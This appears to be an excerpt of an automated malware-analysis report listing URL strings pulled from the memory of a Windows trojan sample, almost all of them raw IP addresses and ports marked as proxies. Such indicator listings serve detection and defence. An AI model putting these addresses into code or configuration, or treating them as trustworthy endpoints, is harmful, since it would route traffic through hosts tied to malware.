                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:26789
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:26789://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:29603
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:29603://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:64579
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:64579://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:8004
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:8004://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8400000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.244.96:1234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.244.96:1234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.251.219:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.251.219:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.22:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.22:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:20258
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:20258://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:32339
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:32339://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:35429
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:35429://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:38403
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:38403://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:55637
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:55637://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:6672
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:6672://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:7248
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.5.121:7248://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C646E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.154.225.163:8100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C646E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.154.225.163:8100://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.158.208.157:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.158.208.157:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.159.136.108:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.159.136.108:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.205.121.196:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.205.121.196:5678://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.213.52.124:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.213.52.124:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.232.245.132
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.232.245.132://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.232.245.132:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.59.99:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.59.99:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.89.201:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.89.201:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAAD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAAF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.40.239.13:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.40.239.13:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.41.14.5:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.41.14.5:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:50446
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.255.162.199:50446://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.105:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.105:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.233:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.233:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.14.122:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.196.14.122:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAEE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.72.68.164:40033
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAEE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.72.68.164:40033://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.145.61.202:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.145.61.202:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:39557
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:39557://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:12519
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:12519://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:1783
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:1783://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:18401
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:18401://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:2254
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:2254://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:43134
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7933000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:43134://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC929000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:41026
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:41026://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC49A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:45366
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:45366://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:60781
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:60781://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:63418
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:63418://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:23836
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:23836://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:27664
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:27664://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:29664
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:29664://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:29664x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:38721
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.78:38721://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:13469
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:13469://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:23836
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:23836://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:27664
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:27664://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:29664
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:29664://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9566000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:38721
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.130.90:38721://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:59369
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:59369://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.98:50965
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.98:50965://proxy
